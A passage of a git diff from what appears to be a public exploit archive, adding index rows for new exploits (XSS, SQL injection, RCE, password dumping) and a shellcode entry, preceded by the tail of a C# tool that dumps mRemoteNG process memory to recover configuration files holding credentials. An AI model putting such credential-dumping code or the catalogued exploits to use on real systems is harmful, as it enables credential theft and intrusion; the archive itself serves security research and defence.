+Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );
+}
+else
+{
+Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
+Console.WriteLine("[+] Deleting memorydump file!");
+File.Delete(dumpFileName);
+}
+}
+}
+}
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 55292c0a6..affafef52 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10349,6 +10349,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28817,exploits/multiple/local/28817.txt,"Internet Security Systems 3.6 - 'ZWDeleteFile()' Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",local,multiple,,2006-10-16,2017-10-16,1,CVE-2006-7129;OSVDB-30901,,,,,https://www.securityfocus.com/bid/20546/info
 19480,exploits/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,local,multiple,,1999-09-02,2012-06-30,1,CVE-1999-0705;OSVDB-16030,,,,,https://www.securityfocus.com/bid/616/info
 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,,2018-07-18,2018-07-18,0,CVE-2018-4192,,,,,https://gist.github.com/itszn/5e6354ff7975e65e5867f3a660e23e05
+51623,exploits/multiple/local/51623.cs,"Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping",2023-07-28,H4rk3nz0,local,multiple,,2023-07-28,2023-07-28,0,CVE-2023-36266,,,,,
 40440,exploits/multiple/local/40440.py,"KeepNote 0.7.8 - Command Execution",2016-09-29,R-73eN,local,multiple,,2016-09-29,2016-09-29,0,,,,,http://www.exploit-db.comkeepnote-0.7.8.tar.gz,
 11364,exploits/multiple/local/11364.txt,"LDAP - Injection",2010-02-09,mc2_s3lector,local,multiple,,2010-02-08,,0,,,,,,
 46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,,2019-04-18,2019-04-18,1,CVE-2018-16858,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
@@ -13386,6 +13387,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29173,exploits/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,webapps,php,,2006-11-23,2016-12-20,1,,,,,,https://www.securityfocus.com/bid/21263/info
 10597,exploits/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,webapps,php,,2009-12-21,,1,CVE-2008-3748;OSVDB-47577,,,,http://www.exploit-db.comapb-1.3.zip,
 7289,exploits/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50834;CVE-2008-5975;CVE-2008-5638;OSVDB-50401,,,,,
+51613,exploits/php/webapps/51613.txt,"Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
 7301,exploits/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50489;CVE-2008-5632,,,,,
 7298,exploits/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,webapps,php,,2008-11-29,2017-01-04,1,OSVDB-50400;CVE-2008-6380,,,,,
 26501,exploits/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,webapps,php,,2005-11-12,2013-07-01,1,CVE-2005-3679;OSVDB-20949,,,,,https://www.securityfocus.com/bid/15400/info
@@ -14328,6 +14330,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21007,exploits/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php?id' Blind SQL Injection",2012-09-02,DaOne,webapps,php,,2012-09-02,2012-09-02,1,OSVDB-85149,,,,,
 4163,exploits/php/webapps/4163.php,"AV Tutorial Script 1.0 - Remote User Pass Change",2007-07-08,Dj7xpl,webapps,php,,2007-07-07,,1,OSVDB-42461;CVE-2007-3630,,,,,
 37511,exploits/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",webapps,php,,2012-07-17,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/54591/info
+51626,exploits/php/webapps/51626.txt,"Availability Booking Calendar v1.0 - Multiple Cross-site scripting (XSS)",2023-07-28,"Andrey Stoykov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 6409,exploits/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,webapps,php,,2008-09-08,,1,OSVDB-47985;CVE-2008-4372;OSVDB-47984;CVE-2008-4371,,,,,
 6522,exploits/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",webapps,php,,2008-09-20,2016-12-21,1,OSVDB-51799;CVE-2008-6037,,,,,
 7456,exploits/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,webapps,php,,2008-12-13,,1,OSVDB-56861;CVE-2008-6900,,,,,
@@ -17066,6 +17069,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5089,exploits/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,webapps,php,,2008-02-08,,1,OSVDB-41555;CVE-2008-0745,,,,,
 30865,exploits/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,webapps,php,,2014-01-17,2014-01-17,0,OSVDB-102204;CVE-2014-10037,,,,,
 30872,exploits/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,webapps,php,,2014-01-15,2014-01-15,1,OSVDB-102180;CVE-2014-10038,,,,,
+51615,exploits/php/webapps/51615.txt,"Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
 31085,exploits/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,webapps,php,80,2014-01-20,2014-01-20,1,OSVDB-102482;OSVDB-102481;OSVDB-102321;OSVDB-102320,,,http://www.exploit-db.com/screenshots/idlt31500/doodle4gift.jpg,,
 4536,exploits/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,webapps,php,,2007-10-14,2017-01-06,1,OSVDB-37864;CVE-2007-5465,,,,http://www.exploit-db.comdoop-1.3.7.zip,
 7569,exploits/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,webapps,php,,2008-12-23,,1,,,,,,
@@ -20491,9 +20495,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5508,exploits/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,webapps,php,,2008-04-26,2016-11-24,1,OSVDB-44671;CVE-2008-2065,,,,,
 15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php,,2010-09-30,2015-07-12,0,OSVDB-68600,,,,,
 40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
+51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
+51631,exploits/php/webapps/51631.txt,"Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php,,2008-05-28,2014-02-24,1,,,,,,https://www.securityfocus.com/bid/29407/info
 31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php,,2008-03-23,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28427/info
 28437,exploits/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,webapps,php,,2006-08-26,2016-12-06,1,CVE-2006-4553;OSVDB-28241,,,,,https://www.securityfocus.com/bid/19725/info
@@ -23530,6 +23536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44646,exploits/php/webapps/44646.txt,"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)",2018-05-18,"Berk Dusunur",webapps,php,,2018-05-18,2018-09-24,0,,,,,,
 45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,,2018-08-07,2018-08-13,0,,,,,,
 49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - Persistent Cross-Site Scripting",2021-04-27,"Ahmad Shakla",webapps,php,,2021-04-27,2021-11-01,0,,,,,,
+51628,exploits/php/webapps/51628.txt,"mooDating 1.2 - Reflected Cross-site scripting (XSS)",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-3849;CVE-2023-3848;CVE-2023-3847;CVE-2023-3846;CVE-2023-3845;CVE-2023-3844;CVE-2023-3843,,,,,
 24071,exploits/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",webapps,php,,2004-04-30,2013-01-13,1,CVE-2004-1978;OSVDB-5747,,,,,https://www.securityfocus.com/bid/10251/info
 3508,exploits/php/webapps/3508.txt,"Moodle 1.5.2 - 'moodledata' Remote Session Disclosure",2007-03-18,xSh,webapps,php,,2007-03-17,,1,OSVDB-43558;CVE-2007-1647,,,,,
 29284,exploits/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",webapps,php,,2006-12-14,2013-10-29,1,CVE-2006-6625;OSVDB-35949,,,,,https://www.securityfocus.com/bid/21596/info
@@ -24573,6 +24580,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44144,exploits/php/webapps/44144.txt,"October CMS < 1.0.431 - Cross-Site Scripting",2018-02-19,"Samrat Das",webapps,php,,2018-02-19,2018-02-19,0,CVE-2018-7198,,,,,
 49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,,2020-11-13,2020-11-13,0,CVE-2020-5295,,,,,
 44546,exploits/php/webapps/44546.txt,"October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting",2018-04-26,0xB9,webapps,php,,2018-04-26,2018-04-26,0,CVE-2018-10366,,,,,
+51630,exploits/php/webapps/51630.txt,"October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-07-28,"Okan Kurtulus",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-15284,,,,,
 43106,exploits/php/webapps/43106.txt,"OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",webapps,php,,2017-11-01,2017-11-01,0,CVE-2017-16244,,,,,
 38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php,,2015-09-10,2015-09-10,0,OSVDB-127456,,,,,
@@ -25521,6 +25529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",2021-09-06,a-rey,webapps,php,,2021-09-06,2021-10-22,0,,,,,,
 27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,webapps,php,,2006-04-12,2013-08-17,1,CVE-2006-1783;OSVDB-31440,,,,,https://www.securityfocus.com/bid/17495/info
 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,,2018-05-24,2018-05-24,0,,,,,,
+51614,exploits/php/webapps/51614.txt,"PaulPrinting CMS - (Search Delivery) Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
 51618,exploits/php/webapps/51618.txt,"PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
 44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
 42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,webapps,php,,2017-06-11,2017-06-11,0,,,,,,
@@ -25615,6 +25624,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",webapps,php,,2010-06-16,,0,OSVDB-52214,,,,,
 4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,webapps,php,,2007-10-20,,1,OSVDB-45501;CVE-2007-5631;OSVDB-45500;OSVDB-45499;OSVDB-45498;OSVDB-45497;OSVDB-45496;OSVDB-45495,,,,,
 11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,webapps,php,,2010-03-29,,1,OSVDB-63348;CVE-2010-1309;CVE-2008-7254,,,,http://www.exploit-db.compepsi-0.6-BETA2.tar.bz2,
+51627,exploits/php/webapps/51627.txt,"Perch v3.2 - Persistent Cross Site Scripting (XSS)",2023-07-28,"Dinesh Mohanty",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 51620,exploits/php/webapps/51620.txt,"Perch v3.2 - Remote Code Execution (RCE)",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
 51621,exploits/php/webapps/51621.txt,"Perch v3.2 - Stored XSS",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,,2018-01-15,2018-01-15,0,CVE-2017-17976,,,,,
@@ -28779,6 +28789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",webapps,php,,2008-05-25,,1,OSVDB-53397;CVE-2008-6634,,,,,
 8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
 8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
+51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-29918,,,,,
 10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
 11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
 3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@@ -32637,6 +32648,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php,,2016-11-17,2016-11-17,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-17-at-161058.png,http://www.exploit-db.comanswer-my-question.zip,
 46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80,2019-03-28,2019-07-05,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comgotmls.4.18.63.zip,
 50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,,2021-07-06,2021-10-29,0,,,,,http://www.exploit-db.comgotmls.4.20.59.zip,
+51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-2636,,,,,
 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-9372;CVE-2020-9371,,,,http://www.exploit-db.comappointment-booking-calendar.zip,
 41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
@@ -34526,8 +34538,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5634,exploits/php/webapps/5634.html,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,webapps,php,,2008-05-15,,1,OSVDB-45513;CVE-2008-2349,,,,,
 34476,exploits/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,webapps,php,,2010-08-15,2016-11-30,1,,,,,,
 15329,exploits/php/webapps/15329.txt,"Zomplog 3.9 - Cross-Site Request Forgery",2010-10-27,"High-Tech Bridge SA",webapps,php,,2010-10-27,2010-10-28,1,OSVDB-67213,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
+51625,exploits/php/webapps/51625.txt,"Zomplog 3.9 - Cross-site scripting (XSS)",2023-07-28,"Mirabbas Ağalarov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 14650,exploits/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,webapps,php,,2010-08-15,2016-11-30,1,OSVDB-67225;OSVDB-67224;OSVDB-67223;OSVDB-67222;OSVDB-67221;OSVDB-67220;OSVDB-67219;OSVDB-67218;OSVDB-67217;OSVDB-67216;OSVDB-67215;OSVDB-67214;OSVDB-67213,,,,,
 15331,exploits/php/webapps/15331.txt,"Zomplog 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-10-27,"High-Tech Bridge SA",webapps,php,,2010-10-27,2010-10-28,1,,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
+51624,exploits/php/webapps/51624.py,"zomplog 3.9 - Remote Code Execution (RCE)",2023-07-28,"Mirabbas Ağalarov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,webapps,php,,2011-08-01,2013-12-09,0,OSVDB-74198;CVE-2013-0332,,,,,
 41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80,2017-02-03,2017-02-03,0,,,,,http://www.exploit-db.comZoneMinder-1.30.0.tar.gz,https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
 47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,,2019-07-01,2019-07-03,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comzoneminder-1.32.3.tar.gz,
@@ -34596,6 +34610,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
 51040,exploits/python/webapps/51040.txt,"Bitbucket v7.0.0 -  RCE",2023-03-23,khal4n1,webapps,python,,2023-03-23,2023-03-23,0,CVE-2022-36804,,,,,
 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb,
+51636,exploits/python/webapps/51636.txt,"copyparty 1.8.2 - Directory Traversal",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,,,,,,
+51635,exploits/python/webapps/51635.txt,"copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,CVE-2023-38501,,,,,
 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
 40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
@@ -40062,6 +40078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 8637,exploits/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",local,windows,,2009-05-06,,1,CVE-2009-1586;OSVDB-54205,,,,,
 51223,exploits/windows/local/51223.py,"Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow",2023-04-03,Knursoft,local,windows,,2023-04-03,2023-04-03,0,,,,,,
 40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comgraylog-collector-0.4.2.zip,
+51633,exploits/windows/local/51633.ps1,"GreenShot  1.2.10 - Insecure Deserialization Arbitrary Code Execution",2023-07-28,p4r4bellum,local,windows,,2023-07-28,2023-07-28,0,CVE-2023-34634,,,,,
 18748,exploits/windows/local/18748.rb,"GSM SIM Editor 5.15 - Local Buffer Overflow (Metasploit)",2012-04-18,Metasploit,local,windows,,2012-04-18,2012-04-18,1,OSVDB-81161,"Metasploit Framework (MSF)",,,,
 14098,exploits/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,local,windows,,2010-06-28,2010-07-03,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14098.png,http://www.exploit-db.commultisim515.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
 14258,exploits/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,local,windows,,2010-07-07,2017-08-17,1,OSVDB-81161,,,,http://www.exploit-db.commultisim515.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
@@ -40905,6 +40922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18954,exploits/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,local,windows,,2012-05-30,2012-05-30,1,OSVDB-74604;CVE-2011-3625,"Metasploit Framework (MSF)",,,,http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf
 17565,exploits/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Local Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 & h1ch4m",local,windows,,2011-07-24,2011-07-29,1,,,,http://www.exploit-db.com/screenshots/idlt18000/17565.png,http://www.exploit-db.commplayer_lite_r33064.7z,
 17013,exploits/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",local,windows,,2011-03-20,2011-03-20,1,OSVDB-104565,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-03-20-at-22830-pm.png,http://www.exploit-db.commplayer_lite_r33064.7z,
+51637,exploits/windows/local/51637.txt,"mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory",2023-07-28,"Maximilian Barz",local,windows,,2023-07-28,2023-07-28,0,"CVE-cve : 2023-30367",,,,,
 40426,exploits/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,local,windows,,2016-09-26,2017-04-15,0,,,,,,
 48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,,2020-09-28,2020-09-28,0,CVE-2020-17382,,,,,
 48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows,,2020-02-17,2020-02-17,0,CVE-2020-0683,,,,http://www.exploit-db.comCVE-2020-0683.zip,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index ba383d280..d3a5a6a0f 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -931,6 +931,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,,windows,195,2010-06-25,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-662.php
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
 51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
+51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,,
 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
